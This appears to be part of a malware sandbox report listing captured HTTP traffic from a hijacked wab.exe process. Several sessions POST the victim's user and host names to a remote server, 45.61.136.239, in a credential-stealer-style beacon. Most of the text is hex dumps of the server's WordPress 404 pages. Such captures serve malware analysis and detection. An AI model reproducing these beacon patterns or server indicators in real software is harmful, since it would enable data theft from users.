                  Jul 3, 2024 09:41:43.863234997 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:41:43.863245964 CEST448INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:41:43.863414049 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
                  Jul 3, 2024 09:41:43.863485098 CEST1236INData Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d
                  Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.74970945.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:41:44.014348984 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 192
                  Connection: close
                  Jul 3, 2024 09:41:44.019391060 CEST192OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: 'ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2CjyoQl
                  Jul 3, 2024 09:41:48.746159077 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:41:44 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:41:48.746176958 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:41:48.746187925 CEST448INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:41:48.746237040 CEST1236INData Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26
                  Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
                  Jul 3, 2024 09:41:48.746248960 CEST1236INData Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d
                  Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                  Jul 3, 2024 09:41:48.746263981 CEST448INData Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61
                  Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
                  Jul 3, 2024 09:41:48.746303082 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:41:48.746313095 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:41:48.746323109 CEST448INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:41:48.746537924 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.74971045.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:41:48.805295944 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:41:48.810177088 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:41:53.534495115 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:41:49 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:41:53.534539938 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:41:53.534548044 CEST1236INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:41:53.534610033 CEST1236INData Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72
                  Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
                  Jul 3, 2024 09:41:53.534624100 CEST1236INData Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65
                  Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
                  Jul 3, 2024 09:41:53.534636021 CEST1236INData Raw: 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c
                  Data Ascii: wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-sep
                  Jul 3, 2024 09:41:53.534641981 CEST1236INData Raw: 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70
                  Data Ascii: */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text
                  Jul 3, 2024 09:41:53.534672022 CEST1236INData Raw: 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64
                  Data Ascii: 0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb
                  Jul 3, 2024 09:41:53.534677982 CEST1236INData Raw: 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d
                  Data Ascii: ge: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--7
                  Jul 3, 2024 09:41:53.534684896 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d
                  Data Ascii: p--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.74971145.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:41:53.897705078 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:41:53.904386044 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:41:58.415245056 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:41:54 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:41:58.415267944 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:41:58.415280104 CEST1236INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:41:58.415731907 CEST1236INData Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72
                  Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
